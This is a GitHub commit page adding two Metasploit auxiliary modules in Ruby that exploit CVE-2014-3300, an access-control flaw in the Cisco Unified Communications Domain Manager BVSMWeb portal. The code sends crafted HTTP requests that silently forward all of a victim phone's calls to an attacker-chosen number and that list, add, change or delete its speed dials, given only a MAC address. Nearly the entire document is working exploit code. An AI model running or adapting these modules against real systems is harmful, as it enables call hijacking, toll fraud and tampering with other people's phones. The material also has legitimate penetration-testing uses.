Skip to content

Commit f7af0d9

Browse files
jvazquez-r7jvazquez-r7
committed
Test landing rapid7#4065 into up to date branch
2 parents bedbffa + d91ffa8 commit f7af0d9

File tree

2 files changed

+277
-0
lines changed

2 files changed

+277
-0
lines changed

modules/auxiliary/voip/cisco_cucdm_callforward.rb

Lines changed: 121 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,121 @@
1+
##
2+
# This module requires Metasploit: http//metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
7+
require 'msf/core'
8+
require 'rexml/document'
9+
10+
11+
class Metasploit3 < Msf::Auxiliary
12+
13+
include Msf::Exploit::Remote::HttpClient
14+
15+
def initialize(info = {})
16+
super(
17+
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
18+
'Description' => %q{
19+
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
20+
in Unified CDM Application Software before 10 does not properly implement access control,
21+
which allows remote attackers to modify user information. This vulnerability can be exploited
22+
for unauthorised call forwarding using this module. This tool can be tested with the fake
23+
voss-xmlservice component of Viproy.
24+
},
25+
'Author' => 'fozavci',
26+
'References' =>
27+
[
28+
['CVE', '2014-3300'],
29+
['BID', '68331'],
30+
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
31+
],
32+
'License' => MSF_LICENSE,
33+
'Actions' =>
34+
[
35+
[ 'Forward', {
36+
'Description' => 'Enabling the call forwarding for the MAC address.'
37+
} ],
38+
[ 'Info', {
39+
'Description' => 'Retrieving the call forwarding information for the MAC address.'
40+
} ]
41+
],
42+
'DefaultAction' => 'Info'
43+
44+
)
45+
46+
register_options(
47+
[
48+
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
49+
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
50+
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
51+
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']),
52+
], self.class)
53+
end
54+
55+
def run
56+
uri = normalize_uri(target_uri.to_s)
57+
mac = Rex::Text.uri_encode(datastore["MAC"])
58+
forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"])
59+
60+
61+
print_status("Getting fintnumbers and display names of the IP phone")
62+
63+
uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}")
64+
vprint_status("URL: "+uri_show)
65+
66+
res = send_request_cgi(
67+
{
68+
'uri' => uri_show,
69+
'method' => 'GET',
70+
})
71+
72+
if res and res.code == 200 and res.body =~ /fintnumber/
73+
doc = REXML::Document.new(res.body)
74+
lines=[]
75+
fintnumbers=[]
76+
77+
list=doc.root.get_elements("MenuItem")
78+
list.each {|lst|
79+
xlist=lst.get_elements("Name")
80+
xlist.each {|l| lines << "#{l[0]}"}
81+
xlist=lst.get_elements("URL")
82+
xlist.each {|l| fintnumbers << "#{l[0].to_s.split("fintnumber=")[1]}" }
83+
}
84+
lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])}
85+
86+
# for a specific FINTNUMBER redirection
87+
fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]
88+
89+
if action.name.upcase == "FORWARD"
90+
fintnumbers.each {|fintnumber|
91+
92+
print_status("Sending call forward request for #{fintnumber}")
93+
94+
uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}")
95+
vprint_status("URL: "+uri_fwd)
96+
res = send_request_cgi(
97+
{
98+
'uri' => uri_fwd,
99+
'method' => 'GET',
100+
})
101+
102+
uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}")
103+
vprint_status("URL: "+uri_fwdpln)
104+
res = send_request_cgi(
105+
{
106+
'uri' => uri_fwdpln,
107+
'method' => 'GET',
108+
})
109+
110+
if res and res.body and res.body.to_s =~ /CFA/
111+
print_good("Call forwarded successfully for #{fintnumber}")
112+
else
113+
print_status("Call forward failed.")
114+
end
115+
}
116+
end
117+
else
118+
print_error("Target appears not vulnerable!")
119+
end
120+
end
121+
end

modules/auxiliary/voip/cisco_cucdm_speeddials.rb

Lines changed: 156 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,156 @@
1+
##
2+
# This module requires Metasploit: http//metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
require 'rexml/document'
8+
9+
class Metasploit3 < Msf::Auxiliary
10+
11+
include Msf::Exploit::Remote::HttpClient
12+
13+
def initialize(info = {})
14+
super(
15+
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
16+
'Description' => %q{
17+
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
18+
in Unified CDM Application Software before 10 does not properly implement access control,
19+
which allows remote attackers to modify user information. This vulnerability can be exploited
20+
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
21+
voss-xmlservice component of Viproy.
22+
},
23+
'Author' => 'fozavci',
24+
'References' =>
25+
[
26+
['CVE', '2014-3300'],
27+
['BID', '68331'],
28+
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
29+
],
30+
'License' => MSF_LICENSE,
31+
'Actions' =>
32+
[
33+
[ 'List', {
34+
'Description' => 'Getting the speeddials for the MAC address.'
35+
} ],
36+
[ 'Modify', {
37+
'Description' => 'Modifying a speeddial for the MAC address.'
38+
} ],
39+
[ 'Add', {
40+
'Description' => 'Adding a speeddial for the MAC address.'
41+
} ],
42+
[ 'Delete', {
43+
'Description' => 'Deleting a speeddial for the MAC address.'
44+
} ]
45+
],
46+
'DefaultAction' => 'List'
47+
)
48+
49+
register_options(
50+
[
51+
Opt::RPORT(80),
52+
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
53+
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
54+
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
55+
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
56+
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
57+
], self.class)
58+
end
59+
60+
def run
61+
uri = normalize_uri(target_uri.to_s)
62+
mac = Rex::Text.uri_encode(datastore["MAC"])
63+
name = Rex::Text.uri_encode(datastore["NAME"])
64+
position = Rex::Text.uri_encode(datastore["POSITION"])
65+
telno = Rex::Text.uri_encode(datastore["TELNO"])
66+
67+
68+
case action.name.upcase
69+
when 'MODIFY'
70+
print_status("Deleting Speed Dial of the IP phone")
71+
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
72+
vprint_status("URL: "+url)
73+
status,res=send_rcv(url)
74+
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
75+
print_good("Speed Dial #{position} is deleted successfully")
76+
print_status("Adding Speed Dial to the IP phone")
77+
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
78+
vprint_status("URL: "+url)
79+
status,res=send_rcv(url)
80+
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
81+
print_good("Speed Dial #{position} is added successfully")
82+
elsif res.body =~ /exist/
83+
print_error("Speed Dial is exist, change the position or choose modify!")
84+
else
85+
print_error("Speed Dial couldn't add!")
86+
end
87+
else
88+
print_error("Speed Dial is not found!")
89+
end
90+
when 'DELETE'
91+
print_status("Deleting Speed Dial of the IP phone")
92+
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
93+
vprint_status("URL: "+url)
94+
status,res=send_rcv(url)
95+
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
96+
print_good("Speed Dial #{position} is deleted successfully")
97+
else
98+
print_error("Speed Dial is not found!")
99+
end
100+
when 'ADD'
101+
print_status("Adding Speed Dial to the IP phone")
102+
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
103+
vprint_status("URL: "+url)
104+
status,res=send_rcv(url)
105+
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
106+
print_good("Speed Dial #{position} is added successfully")
107+
elsif res.body =~ /exist/
108+
print_error("Speed Dial is exist, change the position or choose modify!")
109+
else
110+
print_error("Speed Dial couldn't add!")
111+
end
112+
else
113+
print_status("Getting Speed Dials of the IP phone")
114+
url=uri+"/speeddials.cgi?device=SEP#{mac}"
115+
vprint_status("URL: "+url)
116+
117+
status,res=send_rcv(url)
118+
parse(res) if status != Exploit::CheckCode::Safe
119+
end
120+
121+
end
122+
123+
def send_rcv(uri)
124+
uri=normalize_uri(uri.to_s)
125+
res = send_request_cgi(
126+
{
127+
'uri' => uri,
128+
'method' => 'GET',
129+
})
130+
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
131+
return Exploit::CheckCode::Vulnerable,res
132+
else
133+
print_error("Target appears not vulnerable!")
134+
return Exploit::CheckCode::Safe,res
135+
end
136+
end
137+
138+
def parse(res)
139+
doc = REXML::Document.new(res.body)
140+
names=[]
141+
phones=[]
142+
143+
list=doc.root.get_elements("DirectoryEntry")
144+
list.each {|lst|
145+
xlist=lst.get_elements("Name")
146+
xlist.each {|l| names << "#{l[0]}"}
147+
xlist=lst.get_elements("Telephone")
148+
xlist.each {|l| phones << "#{l[0]}" }
149+
}
150+
if names.size > 0
151+
names.size.times{|i| print_good("Position: "+names[i].split(":")[0]+"\tName: "+names[i].split(":")[1]+"\t"+"Telephone: "+phones[i])}
152+
else
153+
print_status("No Speed Dial detected")
154+
end
155+
end
156+
end

0 commit comments

Comments
 (0)